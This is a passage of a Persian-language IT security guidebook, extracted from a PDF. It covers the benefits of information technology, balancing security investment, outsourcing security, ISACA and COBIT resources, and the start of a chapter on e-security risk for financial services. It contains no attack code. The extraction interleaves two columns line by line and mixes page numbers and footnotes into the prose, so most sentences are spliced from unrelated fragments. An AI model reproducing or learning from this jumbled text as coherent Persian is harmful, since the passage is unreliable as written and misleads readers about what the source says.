‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬

‫‪10‬‬ ‫‪Internet Service Provider‬‬


‫‪11‬‬ ‫‪Distributed Denial of Service Attack‬‬
‫‪12‬‬ ‫‪Blended Threats‬‬
‫‪١٢٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺟﻬﺎﻥ‬


‫ﺻﻨﻌﺘﻲ ﺑﻌﻀﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺳﭙﺮﺩﻥ ﺧـﺪﻣﺎﺕ‬ ‫ﻣﺰﺍﻳﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﻳﺖ ﺁﻥ‬
‫ﻏﻴﺮ ﻛﻠﻴﺪﻱ ﻣﺜﻞ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ‬ ‫ﻋﻠﻴﺮﻏﻢ ﭼﺎﻟﺸﻬﺎﻱ ﻣﻮﺟـﻮﺩ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺁﻓﺮﻳﻨـﺎﻥ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺣﺪﺍﻗﻞ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﺎﻥ ﻳﻚ‬ ‫ﺩﻭﻟﺘــﻲ ﻭ ﺧــﺼﻮﺻﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺑــﻪ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﺑﻌـﻀﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﺔ‬ ‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷـﺎﻣﻞ‬
‫ﺧﺎﺻﻲ ﺑﻪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺎﻧﻲ ﺑﻮﻳﮋﻩ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻲﺳﻴﻢ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻧﺠﻤﻦ ﻛﻨﺘـﺮﻝ ﻭ‬ ‫ﺗﺠﺎﺭﻱ ﻣﺸﻐﻮﻟﻨﺪ ﺗﺎ ﺑﻪ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣﺮﺓ ﺧﻮﺩ ﻛﻤﻚ ﻛـﺮﺩﻩ‬
‫ﻣﻤﻴﺰﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ )‪ ١٥(ISACA‬ﺩﺭ ‪ ۶۰‬ﻛﺸﻮﺭ ﻫﻤﻜﺎﺭ‬ ‫ﺑﺎﺷﻨﺪ‪ .‬ﻣﺰﺍﻳﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ‬
‫ﺗﺠﺎﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻔـﺎﻭﺕ‬ ‫ﺟﺪﻳﺪ ‪ -‬ﻣﺜﻞ ﻛﺎﺭﺁﻳﻲ ﻭ ﺻـﺮﻓﻪﺟـﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨـﻪﻫـﺎ ‪ -‬ﻭﺍﺿـﺢ‬
‫ﺭﺍ ﺑــﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺍﺭﺍﺋــﻪ ﻣــﻲﻛﻨــﺪ‪ ISACA ١٦.‬ﻫﻤﭽﻨــﻴﻦ ﻳــﻚ‬ ‫ﻫﺴﺘﻨﺪ‪:‬‬
‫ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﺭﺳﻴﺪﮔﻲ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨـﺪ ﻭ‬
‫ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ ﺍﺭﺍﺋــﻪ‬ ‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﺠﺎﺭﻱ ﺑﺎ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﻩﻫﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ‬ ‫‪.۱‬‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﻫﻤﻜﺎﺭ ﺑﻬﺒﻮﺩ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛‬

‫ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻪ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺷﻮﻧﺪ ﻭ ﭼﻪ ﺧـﺎﺭﺝ ﺍﺯ‬ ‫ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺠﻢ ﺯﻳﺎﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺳﺮﻋﺖ ﺯﻳﺎﺩ‬ ‫‪.۲‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺁﻥ‪ ،‬ﺑــﺎﺯ ﻫــﻢ ﺗﻮﺳــﻌﻪ ﻭ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎ‪ ،‬ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻭ‬ ‫ﻭ ﺑﺼﻮﺭﺕ ﺍﺭﺯﺍﻧﻘﻴﻤﺖ ﺗﻘﻮﻳﺖ ﻣﻲﺷﻮﺩ؛‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻏﺎﻟﺐ ﺷﺮﻛﺘﻬﺎ ﭼﻴﺰﻱ ﺟﺰ ﺑﺮﻗﺮﺍﺭﻱ ﺗـﻮﺍﺯﻥ‬ ‫ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﻭ‬ ‫‪.۳‬‬
‫ﻣﻴﺎﻥ ﺿـﺎﺑﻄﻪﻫـﺎ ﻧﺨﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ‪ ،‬ﻣـﺪﻳﺮﺍﻥ‪ ،‬ﻭ‬ ‫ﻣﺪﻳﺮﻳﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻫﻤﻴـﺖ ﺩﻫﻨـﺪ ﻭ ﺑـﺎ ﺗﻌﺮﻳـﻒ‬ ‫ﺍﻗﻼﻡ ﺩﺍﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﻣـﺎﻟﻲ‪ ،‬ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮ ﺭﻓﺘـﺎﺭ‬
‫ﺍﻫﺪﺍﻑ ﺭﺳﻤﻲ ﻭ ﺭﺷﺪ ﺣﺪﺍﻗﻞ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴـﺎﻥ‬ ‫ﻣﺸﺘﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻭ ﻓﺮﻭﺵ‪ ،‬ﻭ ﺍﺭﺍﺋـﻪ ﺁﻣـﺎﺭ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺍﻣﻨﻴﺖ‪ ،‬ﻳﻚ ﻣﻌﻴﺎﺭ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ‪.‬‬ ‫ﺩﻗﻴﻘﺘﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻭﻗﺘﻲ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺳﻴﺪ‪ ،‬ﻣﺪﻳﺮﻳﺖ ﻧﺒﺎﻳـﺪ‬
‫ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺍﻳﻦ ﺍﺻـﻼﺣﺎﺕ ﺑـﺪﻭﻥ‬
‫ﺍﻫﻤﻴﺖ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻣﻤﻴﺰﻳﻬﺎﻱ ﻣـﻨﻈﻢ ﻃـﺮﺡ‬
‫ﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‬
‫ﻼ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻛﻨﺪ‪ .‬ﺗﻐﻴﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪ‪ ،‬ﻣﺜ ﹰ‬
‫ﻭ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻤﺘﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺁﻳﻨـﺪ ﺻـﺪﻕ‬
‫ﺍﺯ ﻧﻮﻋﻲ ﻛﻪ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺘﻦﺑﺎﺯ‪ ١٧‬ﻣﻨﺤـﺼﺮ ﺍﺳـﺖ‪،‬‬
‫ﻣﻲﻛﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺑﺨـﺶ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺑﻪ ﺑﺮﺭﺳﻲ ﻛﺎﻣﻞ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑﻄﻮﺭ ﺧﻼﺻـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛـﻪ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﻭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻳﻚ ﻋﻠﻢ ﺑﺎﺷﺪ ﻳﻚ ﻫﻨﺮ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ ﻣﻮﻓـﻖ ﺁﻥ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ‬
‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﺑﺨـﺶ ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﺧﺎﺹ ﺑﻪ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ‪ ،‬ﻣـﺪﻳﺮﺍﻥ‪ ،‬ﻭ‬
‫‪15‬‬ ‫‪Information System Audit and Control‬‬ ‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻣـﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻭ‬
‫)‪Association (ISACA‬‬
‫ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻳﻨﺪﺓ ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ‬ ‫‪۱۶‬‬ ‫ﺩﻳﮕﺮ ﺍﻓﺮﺍﺩ ﺫﻳﻨﻔﻊ ﺩﺭ ﺷﺮﻛﺖ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬ ‫ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ‪ ١٣‬ﻭ ﻳﺎﺩﺩﺍﺷــﺘﻬﺎﻱ ﺭﻭﺍﻝﻣﻨــﺪ‪ ١٤‬ﺑﺮﺍﺣﺘــﻲ‬
‫‪http://www.isaca.org‬‬
‫ﺍﻳﻦ ﻣﻄﺎﻟﻌﻪ ﺑﺎﻋﺚ ﺷﺪ ﻛﺸﻮﺭ ﺍﺭﻭﮔﻮﺋﻪ ﻳﻚ ﻛﺸﻮﺭ ﻣـﻮﺭﺩ ﻋﻼﻗـﻪ ﺑـﺮﺍﻱ‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﺩﻭﻟﺘـﻲ ﻳـﺎ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻣـﻮﺭﺩ‬
‫ﻣﻄﺎﻟﻌﺔ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺷﻮﺩ )‪:(۱‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫‪http://www.isaca.org/ct_case.htm‬‬
‫‪ (http://www.isaca.org/cobit.htm) COBIT‬ﻳﻚ ﺑﺴﺘﺮ ﺑﺮﺍﻱ‬ ‫ﻋﻼﻭﻩ ﺑﺮ ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺍﺧﻠـﻲ‪ ،‬ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻣﻨﺎﺑﻊ ﻣﻨﺎﺳـﺐ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴـﻚ ﺟﻬـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ‪،‬‬
‫ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻧﺪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻛﻨﺘﺮﻝ‪ ،‬ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﺍﺭﺍﺋـﻪ‬
‫ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ ﺑـﺎ ‪ ISACA‬ﺑـﻪ ﺷـﻤﺎ ﺩﻳـﺪ ﺧـﻮﺑﻲ ﺍﺯ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﺗﻲ ﺍﻧﺠﻤﻦ ﻣﻲﺩﻫﺪ‪.‬‬ ‫‪13‬‬ ‫‪Checklist‬‬
‫‪17‬‬ ‫‪Open Source Software Packages‬‬ ‫‪14‬‬ ‫‪Procedural Notes‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٢٦‬‬

‫ﻫﻤﻔﻜﺮﻱ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺘﻔﻜﺮﺍﻥ ﺧـﻼﻕ ﺟﺎﻣﻌـﻪ‬


‫‪١٨‬‬
‫ﻧﻴﺎﺯ ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﺑــﺪﻟﻴﻞ ﺍﻓــﺰﺍﻳﺶ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﺳﺮﺍﺳــﺮ ﺟﻬــﺎﻥ‪ ،‬ﺗﻌــﺪﺍﺩﻱ ﺍﺯ‬ ‫‪۱۸‬‬


‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﺟﻬﺎﻧﻲ ﺁﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﻨﺒـﻊ ﺯﻳـﺮ ﻣﺮﺍﺟﻌـﻪ‬
‫ﻛﻨﻴﺪ‪:‬‬
‫‪Ernst & Young's 2003 Global Information‬‬
‫‪Security Survey:‬‬
‫‪http://www.ey.com/global/download.nsf/US/TS‬‬
‫‪RSGlobal_Information_Security_Survey_2003‬‬
‫‪/$file/TSRS_-‬‬
‫‪_Global_Information_Security_Survey_2003.p‬‬
‫‪df‬‬
‫‪١٢٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻲ‬
‫ﺟﺪﻳﺪ ﺩﺭ ﺗﻤﺎﺱ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻨـﺎﻓﻊ ﺑـﺎﻟﻘﻮﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﻬـﺎﻧ ﹺ‬
‫ﺟﻮﺍﻣﻊ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﺍﺯ‬
‫ﺍﻳﻦ ﺑﺎﺯﺍﺭﻫﺎ ﻣﻴﺴﺮ ﻧﻤﻲﺷﻮﺩ ﻣﮕـﺮ ﺑـﺎ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﺤـﻴﻂ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ .‬ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ‪ ،‬ﺭﻭﻧﺪ ﺣﺮﻛﺖ ﺍﻗﺘﺼﺎﺩ ﺟﻬـﺎﻧﻲ ﺑﺤـﺚ‬
‫ﻋﻤﻴﻘﻲ ﺩﺭﺑﺎﺭﺓ ﺗﺠﺎﺭﺕ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻧﻮﻳﻦ ﺭﺍ ﻣﻲﻃﻠﺒﺪ‪ :‬ﭼﮕﻮﻧﻪ‬ ‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺑﺎﻳﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‪ ٢٢‬ﺭﺍ ﺗﻌﺮﻳـﻒ ﻭ ﺍﺯ ﺁﻥ ﻣﺤﻔﺎﻇـﺖ ﻛـﺮﺩ؟‪،‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻝ ﭼﻪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬـﻮﻣﻲ‬
‫ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ‬
‫‪١٩‬‬
‫ﺩﺍﺭﻧﺪ؟‪ ،‬ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺭﺍ ﻣـﺸﺨﺺ‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻛﺮﺩ؟‪ ،‬ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﭼﮕﻮﻧـﻪ‬
‫ﺺ ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪ )‪ ٢٣(ROI‬ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻧﻤﻮﺩ؟‬
‫ﺑﺎﻳﺪ ﺷﺎﺧ ﹺ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﺑﻪ ﻋﻠﺖ ﻣﺎﻫﻴﺖ ﻫﻤﻮﺍﺭﻩ ﻣﺘﻐﻴ ﹺﺮ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺍﻳﻦ ﻛﺘـﺎﺏ ﻧـﻪﺗﻨﻬـﺎ ﺑـﻪ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺍﺯ ﻛﺘﺎﺏ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺗﻌﺮﻳﻒ‪ ،‬ﻭ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﻳـﻚ‬
‫ﺟﺰﺋﻴﺎﺕ ﺗﻤﺎﻡ ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻤﻲﭘﺮﺩﺍﺯﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺑﻌـﻀﻲ ﺍﺯ‬ ‫ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻫــﺸﺖ ﺭﻛﻨــﻲ ﻭ ﻧﻴــﺰ ﻳــﻚ‬
‫ﺁﻧﻬﺎ ﭘﺎﺳﺨﻬﺎﻱ ﻛﻠﻲ ﻫﻢ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻋـﻮﺽ ﺑـﻪ ﻣـﺮﻭﺭﻱ‬ ‫ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻲ ﺟﻬﺖ ﺗﻘﻮﻳﺖ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ‬
‫ﺳــﺮﻳﻊ ﺑــﺮ ﺁﻧﭽــﻪ ﺗــﺎ ﺍﻣــﺮﻭﺯ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻣﻨﻴــﺖ ﺍﺗﻔــﺎﻕ ﺍﻓﺘــﺎﺩﻩ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺑﺨﺶ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻧﻲ‬


‫ﺷﻜﺎﻓﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﺣﺎﻝ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ‬
‫ﻛﻪ ﺑﺎ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ‪ -‬ﺑـﻮﻳﮋﻩ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ‪،‬‬
